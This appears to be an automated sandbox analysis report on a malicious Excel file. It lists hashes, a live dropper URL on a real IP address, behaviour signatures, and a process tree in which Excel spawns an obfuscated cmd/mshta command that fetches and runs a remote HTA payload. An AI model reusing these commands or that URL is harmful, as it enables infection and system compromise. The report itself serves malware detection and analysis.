Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-11-2024 16:53

General

  • Target

    6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls

  • Size

    71KB

  • MD5

    21fc12ef8a4a4ba5b38a303fa7e70c08

  • SHA1

    5700a2231371b289eae19ce62e1a73457ee582c4

  • SHA256

    6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5

  • SHA512

    8200f14c0a8023bb74b39796f7859258ef67a21a5f81704f82315695409795fe724ac8ca81513a95d50d169c824532e43865846ce42b0e541366309ace849654

  • SSDEEP

    1536:bpEk3hbdlylKsgqopeJBWhZFGkE+cL2NdA8eXZiozeOgXVZKyaZpvyR1kZkJvU+:bCk3hbdlylKsgqopeJBWhZFGkE+cL2Nr

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://185.7.214.7/fer/fe2.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2520
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xb907d607/fer/fe2.html
        3⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:2772

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2032-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2032-1-0x0000000071EDD000-0x0000000071EE8000-memory.dmp

    Filesize

    44KB

  • memory/2032-2-0x0000000071EDD000-0x0000000071EE8000-memory.dmp

    Filesize

    44KB